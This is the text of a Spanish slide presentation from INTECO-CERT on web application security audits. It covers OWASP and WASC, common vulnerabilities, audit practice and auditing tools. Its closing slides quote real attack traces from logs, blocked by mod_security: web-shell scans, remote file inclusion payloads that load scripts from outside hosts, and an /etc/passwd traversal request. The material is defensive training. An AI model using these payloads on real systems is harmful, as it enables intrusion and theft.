Seguridad Web

Transcripción

Seguridad Web
SEGURIDAD WEB:
AUDITORÍAS Y HERRAMIENTAS
Daniel Firvida Pereira
[email protected]
Marzo de 2009
Índice
Seguridad Web: Auditorías y Herramientas
0. Presentación INTECO
1. Auditorías Web
2.
1)
Introducción a la Seguridad Web
2)
OWASP & WASC
3)
Vulnerabilidades Web hoy en día
4)
Procedimientos y técnicas de auditoria Web
Experiencias de INTECO-CERT
1)
Experiencias de colaboración de INTECO-CERT
2
Índice
Seguridad Web: Auditorías y Herramientas
3. Herramientas de auditoría Web
1)
Aplicaciones comerciales de auditoria para Web.
2)
Aplicaciones gratuitas de auditoria para Web.
3)
Plataformas de aprendizaje
4. Otras fuentes de Información
1)
El otro lado: trazas de un ataque Web
2)
Concursos y Retos
3
El Instituto Nacional de Tecnologías de la
Comunicación, INTECO
4
Actuaciones en e-Confianza de INTECO
1. ¿Qué es INTECO?
Instituto Nacional de Tecnologías de la Comunicación
Sociedad estatal adscrita al MITYC a través de SETSI
Instrumento del Plan Avanza para el desarrollo de la S.I
Pilares: Investigación aplicada, prestación de servicios y formación
OBJETIVOS
Convergencia de España con Europa
Crear en León un "Cluster-TIC" con alta capacidad de innovación.
Transversalidad tecnológica entre sectores y áreas de conocimiento TIC
Alta localización de conocimiento intensivo y conexión con otros centros
internacionales.
5
Actuaciones en e-Confianza de INTECO
2. Líneas estratégicas de actuación
e-Confianza
(Seguridad)
Centro de
Respuesta a
Incidentes en
Tecnologías de la
Información para
PYMEs y Ciudadanos
Centro
Demostrador de
Tecnologías de la
Seguridad
Observatorio de
Seguridad de la
Información
Calidad SW
Laboratorio
Nacional de Calidad
Formación
Promoción de
proyectos TIC
Promoción de
estándares y
normalización
Accesibilidad
Centro de
Referencia en
Accesibilidad y
Estándares Web
Centro Nacional de
Tecnologías de la
Accesibilidad
Área de I+D+i en
Accesibilidad Web.
Centro de Gestión
de servicios públicos
interactivos - TDT
Ciudadanía e Internet
Innovación TIC y Competitividad PYME
6
Actuaciones en e-Confianza de INTECO
3. Proyectos en e-Confianza
Sentar las bases de coordinación de iniciativas públicas entorno a la Seguridad
Informática
Coordinar la investigación aplicada y la formación especializada en el ámbito de la
seguridad TIC
Centro de referencia en Seguridad Informática a nivel nacional
INTECO CERT
Centro Demostrador de
Tecnologías de la
Seguridad
Observatorio de la Seguridad de la información
7
INTECO-CERT
Objetivos
Impulsar la confianza en las nuevas tecnologías promoviendo su uso
de forma segura y responsable
Minimizar los perjuicios ocasionados por incidentes de seguridad,
accidentes o fallos facilitando mecanismos de prevención y reacción
adecuados
Prevenir, informar, concienciar y formar a la pyme y el ciudadano
proporcionando información clara y concisa acerca de la tecnología y
el estado de la seguridad en Internet.
8
INTECO-CERT
Servicios de INTECO-CERT en materia de seguridad:
http://cert.inteco.es
Servicios de Información:
•
•
•
Suscripción a boletines y alertas
Actualidad, noticias y eventos
Avisos online sobre nuevos virus, vulnerabilidades, virus más extendidos
por correo electrónico, información sobre correo electrónico no deseado.
Servicios de Formación: guías, manuales, cursos online
Servicios de Protección: útiles gratuitos y actualizaciones de software
Servicios de Respuesta y Soporte:
•
•
•
•
•
Gestión y resolución de Incidencias
Gestión de Malware o código malicioso
Fraude electrónico
Asesoría Legal
Foros
9
INTECO-CERT
Servicios de Información: Vulnerabilidades y Malware
Colaboración con NIST-NVD
Traducción de más de
33.800 vulnerabilidades
Clasificación por nivel de
severidad
Aportación de
vulnerabilidades
descubiertas.
10
INTECO-CERT
Servicios de Información: Virus en el correo
electrónico. Red de sensores de Virus.
Más de 170 sensores
más de 100
millones de correos procesados al día.
0,40% de detección de correos
infectados de virus informáticos en más
de 40.000 millones de correos analizados.
Información de detecciones de malware
en correo en https://ersi.inteco.es/
11
INTECO-CERT
Servicios de Información: SPAM. Red de
sensores de SPAM.
https://ersi.inteco.es/
CORREOS ELECTRÓNICOS
12
INTECO-CERT
Servicios de Formación y Protección.
Formación
Guías y Manuales.
Buenas prácticas.
Preguntas frecuentes.
Protección
Descarga de útiles gratuitos de seguridad
Información sobre actualizaciones de software, parches etc..
Zonas de seguridad por plataformas: Linux, Microsoft, MacOS, Dispositivos
Móviles.
13
INTECO-CERT
Servicios de Formación y Protección.
Protección
Avisos y alertas de seguridad, a través de boletines y web.
14
INTECO-CERT
Servicios de Respuesta y Soporte.
Gestión de incidencias o problemas de seguridad
Resolución y ayuda ante incidentes de seguridad.
Análisis y recomendaciones de seguridad.
Sistemas de detección de malware en la red.
Desarrollo de herramientas propias: CONAN. Configuration
Analisys.
Recoge información del PC susceptible de ser
modificada por código malicioso y cualquier otra
información que nos sirva para determinar si el PC está
o no correctamente configurado.
15
INTECO-CERT
Servicios de Respuesta y Soporte.
Asesoría Legal
Buzón de Consultas, Foros de Usuarios y Asesoría Legal
de Derecho en las Nuevas Tecnologías
Difusión de Guías de buenas prácticas y Manuales de
concienciación y formación sobre legislación y normativas
en materia de Seguridad TIC.
Guías de implantación de medidas que faciliten el
cumplimiento de las disposiciones legales.
[email protected]
16
INTECO-CERT
Servicios de Respuesta y Soporte.
Lucha contra el Fraude
Información a los usuarios sobre todos los tipos de fraude electrónico a través
de foros y buzón [email protected].
Repositorio de fraude de INTECO con información estructurada de los fraudes
detectados
creación de inteligencia sobre fraude electrónico en España.
Colaboración con entidades financieras, FCSE, ISPs y registradores de
dominios.
17
Centro Demostrador de Tecnologías de la Seguridad
Objetivos
Fomentar y difundir el uso de tecnologías de seguridad de la información
Catálogo de Soluciones y Proveedores
Análisis de productos de seguridad
Formación a la PYME
Difusión e impulso de la tecnología de seguridad
Impulso del DNI electrónico y SGSI
http://demostrador.inteco.es
18
Centro Demostrador de Tecnologías de la Seguridad
Catálogo de empresas y soluciones
Catalogación de todos los actores
del mercado, datos de proveedor.
Catalogación de los productos que
ofrecen, datos de producto.
Catalogación de los servicios que
ofrecen, datos de servicio.
Catálogo impreso
19
Centro Demostrador de Tecnologías de la Seguridad
Catálogo online
20
Centro Demostrador de Tecnologías de la Seguridad
Taxonomía de productos y servicios
Productos (31 categorías)
Servicios (14 categorías)
21
Centro Demostrador de Tecnologías de la Seguridad
DATOS ACTUALES DEL
CATÁLOGO
Nº DE
EMPRESAS
557
Nº DE
SOLUCIONES
1007
OFERTA ACTUAL DE PRODUCTOS
Autenticación
104
Anti - Malware
64
Sistemas de seguridad de datos
45
Filtro y control de contenidos
38
OFERTA ACTUAL DE SERVICIOS
Políticas de Seguridad
128
Planificación e implantación de
infraestructuras
107
Cumplimiento con la legislación
(LOPD,..)
102
Certificación y Acreditación
61
22
Centro Demostrador de Tecnologías de la Seguridad
Análisis y demostración de productos y soluciones de
seguridad
Ámbito y alcance de la aplicación
Conocer sus capacidades y características
Análisis funcional y estructural
Ayuda a los fabricantes
Laboratorio de nuevos productos y tecnologías
Generar recomendaciones
23
Centro Demostrador de Tecnologías de la Seguridad
Difusión e impulso de la tecnología de seguridad
Estudio de mercado sobre las soluciones de seguridad TIC
Identificar nichos en la industria TIC española
Promoción de alianzas
Potenciar la tecnología de seguridad española y promover su desarrollo
Acuerdos con entidades de otros países
24
Centro Demostrador de Tecnologías de la Seguridad
Promoción de alianzas
•
Empresas: convenios de colaboración
2008
50 convenios
•
2009
8 convenios
Asociaciones: relación con todas las patronales del
sector.
•
Actores proactivos: banca, universidades,…
25
Centro Demostrador de Tecnologías de la Seguridad
• Eventos propios
• I ENISE
II ENISE
26
Centro Demostrador de Tecnologías de la Seguridad
Formación a la Pyme
Identificación de amenazas
Elaboración de contenidos
Impulso cultura de seguridad
Impulso del uso de tecnologías de seguridad
Jornadas celebradas
25
Pymes sensibilizadas
2200
Media de asistentes
90
27
Programa de Impulso de los SGSI (Sistema de
Gestión de Seguridad de la Información)
Líneas Generales
CATÁLOGO
ORGANISMOS
CERTIFICACIÓN SGSI
Seleccionan
Colabora
CÁMARAS DE
COMERCIO
Organizan
Colabora
con
PYME
Colabora
INTECO
INTECO recibe la
encomienda de
Gestión
JORNADAS Y
TALLERES
SGSI
Seleccionan
CATÁLOGO EMPRESAS
IMPLANTACIÓN SGSI
28
Impulso DNIe: Perfiles de Protección
Los Perfiles de Protección son
documentos que especifican una
solución de seguridad: la creación y
verificación de firma electrónica con
DNIe:
adoptan la legislación y normativa
nacional y europea
definen el nivel de garantía de
seguridad que ofrece una aplicación
certificada que cumpla con el perfil
Los niveles de garantía de seguridad
EAL1 y EAL3 indican la profundidad y
rigor exigido en la evaluación de las
aplicaciones que se quieran certificar.
Van a servir para desarrollar y
certificar aplicaciones de
firma con DNIe con garantías
de seguridad:
Tipo 1: para plataformas TDT,
PDA’s o teléfonos móviles
Tipo 2: para ordenadores
personales con S.O. de propósito
general
Unas Guías que facilitarán a los
desarrolladores el
cumplimiento con los
perfiles se podrán descargar
del Portal del DNIe de
INTECO
29
Resumen de Servicios de eConfianza.
Servicios prestados a pymes y ciudadanos:
Servicios gratuitos de Información a través del portal web, RSS o suscripción
•
•
Actualidad, noticias y eventos
Alertas y estadísticas en tiempo real sobre la seguridad en España
Servicios gratuitos de Formación en Seguridad de la Información
•
•
•
•
Manuales sobre legislación vigente
Configuración de seguridad en sistemas
Guías de resolución de problemas de seguridad
Buenas prácticas para la prevención de problemas de seguridad
Servicios gratuitos de Protección:
•
•
Catálogo de útiles gratuitos de seguridad
Catálogo de actualizaciones de software
Servicios gratuitos de Respuesta y Soporte:
•
•
•
Gestión y resolución de Incidencias de Seguridad
Gestión y soporte ante fraude electrónico
Asesoría Legal
30
Contactos
INTECO-CERT
•
[email protected][email protected][email protected][email protected]
•
http://cert.inteco.es
Centro Demostrador de Tecnologías
de la Seguridad
•
[email protected][email protected][email protected]
•
http://demostrador.inteco.es
31
Dónde estamos
www.inteco.es
Sede
Sede de
de INTECO
INTECO
Avda.
Avda. Jose
Jose Aguado
Aguado 41
41
Edificio
Edificio INTECO
INTECO
24005
24005 LEÓN
LEÓN
Tel:
Tel: (+34)
(+34) 987
987 877
877 189
189
Fax:
Fax: (+34)
(+34) 987
987 261
261 016
016
32
¿Preguntas?
33
Seguridad Web
34
1. Auditorías Web
Introducción a la seguridad Web
Problemática de seguridad en las aplicaciones Web
•
•
•
•
•
Cada vez son aplicativos mas complejos y dinámicos.
Resultan “fáciles” comprometer o atacar.
Muchas veces están accesibles desde Internet y forman parte del
perímetro de seguridad de la empresa.
Se trata de aplicaciones sin visión de la seguridad en su desarrollo.
La seguridad en Internet no depende exclusivamente de la seguridad de la
red o de los sistemas, sino también de las aplicaciones que están
accesibles
La seguridad de las aplicaciones Web resulta muy importante y para
ello debemos auditarlas y asegurarnos de que no suponen un riesgo
para la organización.
35
1. Auditorías Web
OWASP: Open Web Application Security Project
¿Qué es OWASP?
•
•
•
•
Fundación sin animo de lucro.
Creada en 2001.
Independiente de los fabricantes.
Formada por voluntarios.
Objetivos:
•
•
•
•
Promover la seguridad de las aplicaciones web.
Buscar las causas de la inseguridad.
Proporcionar soluciones a las amenazas.
Crear herramientas, documentación y estándares.
36
1. Auditorías Web
OWASP: Open Web Application Security Project
¿Qué hace OWASP?
•
•
•
•
Recursos para equipos de desarrollo.
Foros de discusión.
Aplicaciones para auditoria y para formación.
Documentación y artículos.
Proyectos dentro de OWASP:
•
•
•
•
•
Webscarab: Herramienta para auditoria.
WebGoat: Herramienta para formación.
OWASP Testing: Metodología.
Web Application Penetration Checklist: Documentación.
OWASP Guide y Top Ten Project: Documentación.
37
1. Auditorías Web
WASC: Web Application Security Consortium
¿Qué es WASC?
•
•
Participada por la industria, expertos y organizaciones.
Foro abierto de participación.
Objetivos:
•
•
•
Promover estándares de seguridad web.
Elaboración de artículos y guías de seguridad web.
Compartir el conocimiento sobre las amenazas web.
Proyectos:
•
•
•
•
Application Security Scanner Evaluation Criteria.
Web Hacking Incidents Database.
Distributed Open Proxy Honeypots.
Web Security Threat Classification.
38
1. Auditorías Web
• Vulnerabilidades Web
El vector de ataque de las Vulnerabilidades Web son las Peticiones
El protocolo HTTP define diversos tipos de peticiones conocidos como
métodos, los comunes son los siguientes:
•
•
•
•
•
•
•
•
OPTIONS: Permite listar todos los métodos permitidos por el servidor.
GET: Sirve para solicitar un objeto Web, admite parámetros
HEAD: Solicita la cabecera HTTP del servidor Web.
POST: Sirve para solicitar un objeto Web, admite parámetros.
PUT: Permite enviar un fichero al servidor Web.
DELETE: Borra un objeto Web.
TRACE: Tiene como finalidad propósitos de depuración.
CONNECT: Permite conectar a otro servidor host (proxy, webserver, ...).
39
1. Auditorías Web
• Vulnerabilidades Web
Problemática: Autenticación en aplicaciones Web
•
•
•
•
Autenticación anónima (sin autenticación)
Autenticación a través de la propia aplicación Web
• Basada en formularios mediante peticiones de tipo GET / POST
Autenticación basada en el protocolo HTTP
• HTTP Tipo Basic
• HTTP Tipo Digest
Autenticación a través de credenciales del sistema operativo
• Cuentas de usuario locales o del dominio (AD, ldap, ...)
• Seguridad en función del sistema de ficheros (NTFS, ...)
40
1. Auditorías Web
• Vulnerabilidades Web
Ataques a los mecanismos de autenticación en las aplicaciones Web:
•
•
•
•
Captura de credenciales (sniffing o hijacking)
• Si las credenciales de autenticación no viajan por un canal cifrado
(SSL) es posible capturar las credenciales de autenticación
utilizadas.
Identificación de cuentas de usuario validas
• Respuestas diferentes cuando el usuario introducido es incorrecto de
cuando es la contraseña introducida es incorrecta
Denegación de servicio a los mecanismos de autenticación
• A realizar n intentos de autenticación fallidos y la aplicación no esta
correctamente parametrizada es posible bloquear las cuentas de
usuario
Ataque por Fuerza Bruta o Diccionario
• Si se combina la identificación de usuario con una incorrecta política
de bloqueo de cuentas puede realizarse estos ataques
41
1. Auditorías Web
• Vulnerabilidades Web
Problemática: Gestión de las Sesiones en las aplicaciones Web
•
•
•
•
•
El protocolo HTTP es un protocolo sin estado, se necesitan identificadores
de sesión.
La gestión de sesiones es un proceso ligado con el proceso de
autenticación de usuario.
Se asocia al usuario un identificador de Sesión que este enviara a la
aplicación Web en cada petición
El identificador de sesión es generalmente una cadena de caracteres
generada “aleatoriamente”
El identificador de sesión forma parte de la cabecera HTTP, como Cookie.
Aunque es posible enviarlo en peticiones de tipo GET o POST
42
1. Auditorías Web
• Vulnerabilidades Web
Ataques a los mecanismos de gestión de identificadores de Sesión
•
•
•
•
Ataques de interceptación de sesión
• Existen diferentes ataques de intercepción por ejemplo: sniffing,
XSS, SQL injection, etc.
Ataques por predicción del identificador
• Si la cadena de caracteres del identificador no es suficientemente
aleatoria puede permitir su predicción
Ataques por Fuerza Bruta
• Si el algoritmo utilizado para la generación del identificador no es
suficientemente robusto, puede ser posible obtener una sesión
valida por fuerza bruta
Ataques de Fijación de sesión
• Si la aplicación no gestiona la caducidad de las sesiones o asocia
siempre la misma sesión a un mismo usuario puede permitir el robo
de sesiones por diversos métodos (virus, hijacking, etc)
43
1. Auditorías Web
• Vulnerabilidades Web
Problemática: Validación de caracteres de entrada y salida
•
•
Incorrecto control de los caracteres en variables de entrada.
• SQL injection
• Command Injection
• Inclusión de código script de servidor.
• Idap injection
• Include path
• Transversal Directory
Incorrecto control de los tamaños de las variable de entrada
• Desbordamientos de Buffer
• Denegaciones de Servicio
Ataques de validación de I/O:
•
El limite es la imaginación
44
1. Auditorías Web
• Vulnerabilidades Web hoy en dia:
El Top 10 de vulnerabilidades de OWASP
Cross Site Scripting (XSS).
Inyecciones de código.
Ejecución de ficheros maliciosos.
Manipulación de rutas a objetos.
Cross Site Request Forgery (CSRF).
Manejo inadecuado de errores.
45
1. Auditorías Web
• Vulnerabilidades Web hoy en dia:
El Top 10 de vulnerabilidades de OWASP
Robo de credenciales de sesión o de control de acceso.
Almacenamiento de datos inseguro.
Comunicaciones por un canal inseguro.
Fallo en la ocultación de URLs de gestión.
http://www.owasp.org/index.php/Top_10_2007
http://www.owasp.org/index.php/Top_10_2004
46
1. Auditorías Web
Utilización de la herramienta adecuada a cada aplicativo.
Metodología de auditoria.
OWASP Testing.
Web Application Penetration Checklist.
OSSTMM.
Chequear todos los resultados de las herramientas.
Uso de herramientas para localización de URLs ocultas.
Conocer en lo posible la aplicación.
47
1. Auditorías Web
Documentarse sobre las vulnerabilidades existentes.
Uso de distintos patrones de los ataques
XSS (Cross Site Scripting) Cheat Sheet http://ha.ckers.org/xss.html
XSSDB attack database - http://www.gnucitizen.org/xssdb/
Captura de evidencias.
No realizar denegaciones de Servicio.
Uso de herramientas de aprendizaje como WebGoat o
participación en concursos de hacking
48
1. Auditorías Web
Es importante no menospreciar las fugas de información en las
respuestas del servidor
Es necesario validar todos los caracteres de entrada en las
variables de peticiones GET y POST
Hay que generar identificadores de sesión complejos, con
aleatoriedad, enviarlos a través de las Cookies y con caducidad
Utilización de contraseñas fuertes.
Validar el identificador de sesión en todas las páginas.
No almacenar las contraseñas en claro en la Base de Datos.
No utilizar variables ocultas que no deseen ser vistas o
modificadas por el usuario.
49
2. Experiencias de INTECO-CERT
Gestión de incidencias o problemas de seguridad
Resolución y ayuda ante incidentes de seguridad.
Análisis y recomendaciones de seguridad.
Sistemas de detección de malware en la red.
Ministerio de Vivienda: A partir de un incidente
de seguridad en la pagina web se realizo un
análisis exhaustivo de la seguridad de la misma.
Foro Internacional de Contenidos Digitales:
Revisión de seguridad de la Web del Foro
Internacional de Contenidos Digitales (FICOD
2008) del Ministerio de Industria.
50
2. Experiencias de INTECO-CERT
Vulnerabilidades más encontradas
Vulnerabilidades de SQL injection.
• Con obtención de usuarios y contraseñas.
Incorrecto manejo de sesiones.
• Posibilidad de saltarse la autenticación y obtener una sesión
privilegiada en la aplicación.
Incorrecta configuración del servidor.
• Listado de directorios.
• Obtención de información sensible del servidor.
• Acceso a ficheros de logs.
Versiones no actualizadas o con vulnerabilidades.
• Versiones de PHP, del gestor de contenidos, etc.
51
3. Herramientas de auditoría Web
• Aplicaciones comerciales
Características comunes
Propósito múltiple (no exclusivas por vulnerabilidad).
Capacidad de auditoria ante cualquier tipo de aplicativo.
Incorporan utilidades para pruebas manuales.
Aspectos Configurables.
Proporcionan abundante documentación.
Suelen ser herramientas lentas.
Tienen muchos falsos positivos.
Un elevado precio.
52
3. Herramientas de auditoría Web
• Acunetix Web Vulnerability Scanner
53
3. Herramientas de auditoría Web
• IBM Rational AppScan
54
3. Herramientas de auditoría Web
• HP WebInspect
55
3. Herramientas de auditoría Web
• Aplicaciones gratuitas
Características comunes
La mayoría son para un propósito especifico.
Tienen limitaciones para algún tipo de aplicativo.
Incorporan utilidades para pruebas manuales.
Mayor capacidad de configuración.
Proporcionan menos documentación.
Suelen ser herramientas lentas.
Tienen muchos falsos positivos.
Son gratis ☺.
56
3. Herramientas de auditoría Web
• WebScarab
57
3. Herramientas de auditoría Web
• Paros
58
3. Herramientas de auditoría Web
• w3af
59
3. Herramientas de auditoría Web
• Plataformas de aprendizaje: WEBGOAT
60
3. Herramientas de auditoría Web
• Plataformas de aprendizaje: WEBGOAT
Video Soluciones
http://yehg.net/lab/pr0js/training/webgoat.php
61
3. Herramientas de auditoría Web
• Plataformas de aprendizaje: HACKME FOUNDSTONE
http://www.foundstone.com/us/resources-free-tools.asp
62
4. Otras fuentes de Información
Búsqueda de un objetivo para un ataque
GET /horde-3.0.6//README HTTP/1.1
GET /horde-3.0.7//README HTTP/1.1
GET /horde-3.0.8//README HTTP/1.1
GET /email//README HTTP/1.1
GET /webmail//README HTTP/1.1
GET /mailz//README HTTP/1.1
GET /horde2//README HTTP/1.1
GET //scgi/awstats/awstats.pl HTTP/1.1
GET //scripts/awstats.pl HTTP/1.1
GET //cgi-bin/awstats/awstats.pl HTTP/1.1
GET //cgi-bin/stats/awstats.pl HTTP/1.1
GET //scgi-bin/stats/awstats.pl HTTP/1.1
CONNECT 195.175.37.70:8080 HTTP/1.0
OPTIONS * HTTP/1.0
63
4. Otras fuentes de Información
Búsqueda de un objetivo para un ataque
GET /phpMyAdmin/main.php HTTP/1.0
GET /phpmyadmin/main.php HTTP/1.0
GET /phpmyadmin/tbl_select.php HTTP/1.1
GET /phpmyadmin0/tbl_select.php HTTP/1.1
GET /mysql/phpmyadmin/tbl_select.php HTTP/1.1
GET /xampp/phpmyadmin/tbl_select.php HTTP/1.1
GET /phpmyadmin2/read_dump.php HTTP/1.0
GET /phpMyAdmin-2.2.3/read_dump.php HTTP/1.0
GET /phpmyadmin/r57.php HTTP/1.1
GET /phpmyadmin/c99.php HTTP/1.1
GET /phpmyadmin/shell.php HTTP/1.1
GET /phpmyadmin/cmd.php HTTP/1.1
GET /w00tw00t.at.ISC.SANS.MSlog:) HTTP/1.1
GET /w00tw00t.at.ISC.SANS.Pwn!t:) HTTP/1.1
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1
64
4. Otras fuentes de Información
Trazas de un intento de ataque
/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thera
nchjohnstown.com/menu/r7?? HTTP/1.1
/en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.a
ltervista.org/a.txt?? HTTP/1.1
/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.alter
vista.org/a.txt?? HTTP/1.1
/textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://ft
p.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF
/1? HTTP/1.1
//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://80.50.253.9
0/upload/071011004039p/old? HTTP/1.1
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
HTTP/1.1
65
4. Otras fuentes de Información
Trazas de un intento de ataque
GET
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://80.3
4.102.151/joomla/1.gif?/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Close
Host: 85.17.35.X
User-Agent: Morfeus Fucking Scanner
mod_security-action: 406
HTTP/1.1 406 Not Acceptable
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
66
4. Otras fuentes de Información
Trazas de un intento de ataque
GET
/textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:/
/ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%F
F/1? HTTP/1.1
Connection: TE, close
Host: www.X.com
TE: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.808
mod_security-action: 406
HTTP/1.1 406 Not Acceptable
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
67
4. Otras fuentes de Información
Trazas de un intento de ataque
GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0
Connection: Keep-Alive
Content-Length: 0
Host: www.X.net
User-Agent: Mozilla/4.75 (Nikto/1.35 )
mod_security-action: 406
HTTP/1.1 406 Not Acceptable
Connection: close
Content-Type: text/html; charset=iso-8859-1
68
4. Otras fuentes de Información
CONCURSOS Y RETOS
Retos Hacking (I – IX)
http://elladodelmal.blogspot.com/search/label/Reto%20Hacking
Concurso BSGAME #1
http://blindsec.com:81/
http://www.yoire.com/1190-primer-torneo-de-seguridad-blindsec-bsgame-1
SecGame SG6Labs
http://www.sg6.es/labs/
69
¿Preguntas?
70
Muchas gracias
71
www.inteco.es

Documentos relacionados